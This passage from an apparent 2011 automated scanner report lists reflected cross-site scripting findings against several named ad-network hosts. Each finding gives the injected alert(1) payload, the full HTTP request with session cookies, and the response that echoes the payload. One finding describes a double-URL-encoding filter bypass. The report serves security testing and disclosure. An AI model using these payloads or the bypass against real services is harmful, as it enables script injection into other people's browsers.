this.previewMode = (("%PreviewMode" == "true") ? true : false);
this.debugEventsMode = (("%DebugEventsMode" == "true")
...[SNIP]...

3.52. http://ad.doubleclick.net/adj/KOMO/HOME [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/KOMO/HOME

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27956'-alert(1)-'a0fcdcacbd9 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/KOMO/HOME;sz=27956'-alert(1)-'a0fcdcacbd9 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.komonews.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 50370
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 23 Feb 2011 21:38:11 GMT
Expires: Wed, 23 Feb 2011 21:38:11 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
ttp://ad.doubleclick.net/activity;src=2127271;stragg=1;v=1;pid=18824836;aid=236883395;ko=0;cid=40818774;rid=40836561;rv=1;rn=2307084;";
this.swfParams = 'src=2127271&rv=1&rid=40836561&=27956'-alert(1)-'a0fcdcacbd9&';
this.renderingId = "40836561";
this.previewMode = (("%PreviewMode" == "true") ? true : false);
this.debugEventsMode = (("%DebugEventsMode" == "true")
...[SNIP]...

3.53. http://ad.turn.com/server/pixel.htm [fpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e6ed"><script>alert(1)</script>aa0256ac30a was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=1e6ed"><script>alert(1)</script>aa0256ac30a HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/728x90/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/d56a8ca8-fcd6-4f11-be56-d400a24d3999?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349044
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=CMHOO7uf_udLLq9eGtJ3PdQJcQ_K22BQHXQ-dT6incxd6ISB_q_vS5rapRhLZ6kjvFBMD_r71JCvgjjawylbas-n3UVMoc2HfetiqdcGK7-MifLpV7fqak3Dns_efbQIZw0xnwcn-ju7SUW_27p2BuIIvMb-MRyDgs7z-nEGMqA; fc=NVeBshHSVnoUxhcixGrBhDuuhRKDd8vnh1xheKiYPKd3AL7Gx9Az1OHn7o3KNmBFGJEeoEGIaoMAXW2vTWlmm73wc-cQ7FRKnITKYzO3zYV52dhK4dSErN9-EcLOAtq0; pf=pdEodDKRQncnfsbhMkHepg5DGCQ18I8JWnp-qTHvZFsPkNaW3X0pm_fQ4RfYGdhSpTBAM4oF9IkquHFs0_EGjDJsK7mjf-D1y3j2WAHvG04; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12; rds=15082%7C15082%7C15082%7C15082%7Cundefined%7C15082%7C15082%7Cundefined%7C15082%7C15082%7C15082%7C15082%7C15082%7C15082%7Cundefined%7C15082; rv=1; uid=2931142961646634775

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Tue, 18-Oct-2011 01:28:17 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 21 Apr 2011 01:28:16 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=3559043653072074332&fpid=1e6ed"><script>alert(1)</script>aa0256ac30a&nu=n&t=&sp=n&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

3.54. http://ad.yieldmanager.com/v0/admeld-match [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /v0/admeld-match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8fd4f%2527%253balert%25281%2529%252f%252f95e61b15dae was submitted in the admeld_callback parameter. This input was echoed as 8fd4f';alert(1)//95e61b15dae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the admeld_callback request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /v0/admeld-match?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=420&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match8fd4f%2527%253balert%25281%2529%252f%252f95e61b15dae HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/160x600/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/d5a43de1-76cb-482d-b60c-710bb61c0a49?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349054
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!#!#M*E!,Y+@!$Xwq!/h[p!%:3<!!!!$!?5%!(/4f4!w1K*!%4fo!'i8L!'>d6~~~~~<vl)[<wjgu~"; ih="b!!!!-!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH"; bh="b!!!!2!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!ObA!!!!#<vn<'!#2YX!!!!#<vl)_!#5[N!!!!#<vl)_!#Qh8!!!!#<w,W$!#_0B~~!#`S2!!!!#<vn<'!#aH+!!!!#<w<=N!#aH.!!!!#<w<=N!#b.n!!!!#<w<=N!#c-u!!!!-<w*F]!#ec,!!!!#<w<=N!#yX.!!!!9<w*F[!$%gR!!!!#<w,SV"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 01:29:27 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Cache-Control: private
Content-Length: 328
Content-Type: text/javascript
Age: 0
Proxy-Connection: close
Server: YTS/1.18.4

document.write('<img width="0" height="0" src="http://tag.admeld.com/match8fd4f';alert(1)//95e61b15dae?admeld_adprovider_id=420&external_user_id=3%3b0%3bihn3kEv_yJVBLq40juPCHw4S8WTTFFjJy1c7KRR34fVKYQulvHHdnbbVjwE-&expiration=1304558967" />
...[SNIP]...

3.55. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b0dd'-alert(1)-'317f5ca6ea7 was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=1939b0dd'-alert(1)-'317f5ca6ea7&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/728x90/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/d56a8ca8-fcd6-4f11-be56-d400a24d3999?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349044
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII3I4BEAoYCSAJKAkwsvqt7QQQsvqt7QQYCA..; uuid2=2724386019227846218; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6W+Yo.b7e5'Qr*n#0-+APASPp[Bs3dk4*4W2@5sJdI5v%Y.@+!_/VvMXSE*bt=_O$3b_^wlH]t*WlBJ^1-5$V<I_9kqO#*eDcTw6zN8L)X*7P(eC)!'W$^W[Ye0fJA^f>PH-M5YB///''voY:[:'c*00u`4jlX%LRMdwxiNov]c_Z!6y@AQ$`QY

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 22-Apr-2011 01:29:16 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 20-Jul-2011 01:29:16 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Thu, 21 Apr 2011 01:29:16 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=1939b0dd'-alert(1)-'317f5ca6ea7&external_user_id=2724386019227846218&expiration=0" width="0" height="0"/>');

3.56. http://admeld.adnxs.com/usersync [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c4af'-alert(1)-'15172c93042 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match5c4af'-alert(1)-'15172c93042 HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/728x90/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/d56a8ca8-fcd6-4f11-be56-d400a24d3999?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349044
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII3I4BEAoYCSAJKAkwsvqt7QQQsvqt7QQYCA..; uuid2=2724386019227846218; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6W+Yo.b7e5'Qr*n#0-+APASPp[Bs3dk4*4W2@5sJdI5v%Y.@+!_/VvMXSE*bt=_O$3b_^wlH]t*WlBJ^1-5$V<I_9kqO#*eDcTw6zN8L)X*7P(eC)!'W$^W[Ye0fJA^f>PH-M5YB///''voY:[:'c*00u`4jlX%LRMdwxiNov]c_Z!6y@AQ$`QY

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 22-Apr-2011 01:29:32 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 20-Jul-2011 01:29:32 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Thu, 21 Apr 2011 01:29:32 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/match5c4af'-alert(1)-'15172c93042?admeld_adprovider_id=193&external_user_id=2724386019227846218&expiration=0" width="0" height="0"/>');

3.57. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_adprovider_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.lucidmedia.com
Path:   /clicksense/admeld/match

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29856'%3balert(1)//8edbefe157e was submitted in the admeld_adprovider_id parameter. This input was echoed as 29856';alert(1)//8edbefe157e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /clicksense/admeld/match?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=7329856'%3balert(1)//8edbefe157e&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/160x600/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/ce486e34-952b-40f2-86f9-06615005178d?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349053
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain
Date: Thu, 21 Apr 2011 01:31:08 GMT
Expires: Thu, 21 Apr 2011 01:31:08 GMT
P3P: CP=NOI ADM DEV CUR
Server: Apache-Coyote/1.1
Set-Cookie: 2=2xpe64Z76BY; Domain=.lucidmedia.com; Expires=Fri, 20-Apr-2012 01:31:08 GMT; Path=/
Content-Length: 192
Connection: keep-alive

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/match?admeld_adprovider_id=7329856';alert(1)//8edbefe157e&external_user_id=3419824627245671268"/>');

3.58. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.lucidmedia.com
Path:   /clicksense/admeld/match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4983'%3balert(1)//3f86c4c8f66 was submitted in the admeld_callback parameter. This input was echoed as d4983';alert(1)//3f86c4c8f66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /clicksense/admeld/match?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchd4983'%3balert(1)//3f86c4c8f66 HTTP/1.1
Host: admeld.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/160x600/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/ce486e34-952b-40f2-86f9-06615005178d?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349053
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain
Date: Thu, 21 Apr 2011 01:31:38 GMT
Expires: Thu, 21 Apr 2011 01:31:39 GMT
P3P: CP=NOI ADM DEV CUR
Server: Apache-Coyote/1.1
Set-Cookie: 2=2xpe64Z76BY; Domain=.lucidmedia.com; Expires=Fri, 20-Apr-2012 01:31:39 GMT; Path=/
Content-Length: 192
Connection: keep-alive

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/matchd4983';alert(1)//3f86c4c8f66?admeld_adprovider_id=73&external_user_id=3419824627245671268"/>');

3.59. http://ads.pointroll.com/PortalServe/ [dom parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the dom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e979"%3balert(1)//0b6e4c29a71 was submitted in the dom parameter. This input was echoed as 9e979";alert(1)//0b6e4c29a71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1247240J45720110330184804&flash=10&time=3|20:25|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3af0/3/0/%2a/v%3B239300729%3B0-0%3B10%3B55854524%3B2321-160/600%3B41539824/41557611/1%3Bu%3D%2Ccm-42181530_1303349054%2C11f8f328940989e%2Cent%2Cax.40%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-42181530_1303349054%2C11f8f328940989e%2Cent%2Cax.40%3B%3Bcmw%3Dowl%3Bsz%3D160x600%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D82789%3Bcontx%3Dent%3Ban%3D40%3Bdc%3Dw%3Bbtg%3D%3B%7Eaopt%3D3/1/e5/0%3B%7Esscs%3D%3f$CTURL$&pos=x&dom=http://poponthepop.com9e979"%3balert(1)//0b6e4c29a71&r=0.1835262831300497 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/160x600/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/ce486e34-952b-40f2-86f9-06615005178d?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349053
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRvt=CBJBaEoSNMBpPqAI5BBe; F1FPLN=1*1303435143; PRgo=BBBAAsJvBBF-19!B; PRimp=63A10400-F398-9A14-0209-527000710100; PRca=|AJvr*1753:1|AKLp*1753:1|AJcC*23172:1|#; PRcp=|AJvrAA2R:1|AKLpAA2R:1|AJcCAGBk:1|#; PRpl=|FCbK:1|FPLN:1|Eoxl:1|#; PRcr=|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 01:29:37 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr1247240' src='http://ads.pointroll.com/PortalServe/?pid=1247240J45720110330184804&cid=1467337&pos=h&redir=http://ad.doubleclick.net/click%3Bh=v8/3af0/3/0/*/v%3B2393007
...[SNIP]...
-42181530_1303349054,11f8f328940989e,ent,ax.40%3B%3Bcmw=owl%3Bsz=160x600%3Bnet=cm%3Benv=ifr%3Bord1=82789%3Bcontx=ent%3Ban=40%3Bdc=w%3Bbtg=%3B~aopt=3/1/e5/0%3B~sscs=%3F$CTURL$&dom=http://poponthepop.com9e979";alert(1)//0b6e4c29a71&time=3|20:25|-5&r=0.1835262831300497&flash=10&server=polRedir' width='160' height='600' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

3.60. http://ads.pointroll.com/PortalServe/ [flash parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the flash request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f7d2"%3balert(1)//c02338f36b3 was submitted in the flash parameter. This input was echoed as 5f7d2";alert(1)//c02338f36b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1247240J45720110330184804&flash=105f7d2"%3balert(1)//c02338f36b3&time=3|20:25|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3af0/3/0/%2a/v%3B239300729%3B0-0%3B10%3B55854524%3B2321-160/600%3B41539824/41557611/1%3Bu%3D%2Ccm-42181530_1303349054%2C11f8f328940989e%2Cent%2Cax.40%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-42181530_1303349054%2C11f8f328940989e%2Cent%2Cax.40%3B%3Bcmw%3Dowl%3Bsz%3D160x600%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D82789%3Bcontx%3Dent%3Ban%3D40%3Bdc%3Dw%3Bbtg%3D%3B%7Eaopt%3D3/1/e5/0%3B%7Esscs%3D%3f$CTURL$&pos=x&dom=http://poponthepop.com&r=0.1835262831300497 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/160x600/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/ce486e34-952b-40f2-86f9-06615005178d?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349053
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRvt=CBJBaEoSNMBpPqAI5BBe; F1FPLN=1*1303435143; PRgo=BBBAAsJvBBF-19!B; PRimp=63A10400-F398-9A14-0209-527000710100; PRca=|AJvr*1753:1|AKLp*1753:1|AJcC*23172:1|#; PRcp=|AJvrAA2R:1|AKLpAA2R:1|AJcCAGBk:1|#; PRpl=|FCbK:1|FPLN:1|Eoxl:1|#; PRcr=|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 01:29:33 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr1247240' src='http://ads.pointroll.com/PortalServe/?pid=1247240J45720110330184804&cid=1467337&pos=h&redir=http://ad.doubleclick.net/click%3Bh=v8/3af0/3/0/*/v%3B2393007
...[SNIP]...
%3B%3Bcmw=owl%3Bsz=160x600%3Bnet=cm%3Benv=ifr%3Bord1=82789%3Bcontx=ent%3Ban=40%3Bdc=w%3Bbtg=%3B~aopt=3/1/e5/0%3B~sscs=%3F$CTURL$&dom=http://poponthepop.com&time=3|20:25|-5&r=0.1835262831300497&flash=105f7d2";alert(1)//c02338f36b3&server=polRedir' width='160' height='600' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

3.61. http://ads.pointroll.com/PortalServe/ [r parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the r request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30fb7"%3balert(1)//54cbf026620 was submitted in the r parameter. This input was echoed as 30fb7";alert(1)//54cbf026620 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1247240J45720110330184804&flash=10&time=3|20:25|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3af0/3/0/%2a/v%3B239300729%3B0-0%3B10%3B55854524%3B2321-160/600%3B41539824/41557611/1%3Bu%3D%2Ccm-42181530_1303349054%2C11f8f328940989e%2Cent%2Cax.40%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-42181530_1303349054%2C11f8f328940989e%2Cent%2Cax.40%3B%3Bcmw%3Dowl%3Bsz%3D160x600%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D82789%3Bcontx%3Dent%3Ban%3D40%3Bdc%3Dw%3Bbtg%3D%3B%7Eaopt%3D3/1/e5/0%3B%7Esscs%3D%3f$CTURL$&pos=x&dom=http://poponthepop.com&r=0.183526283130049730fb7"%3balert(1)//54cbf026620 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/160x600/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/ce486e34-952b-40f2-86f9-06615005178d?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349053
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
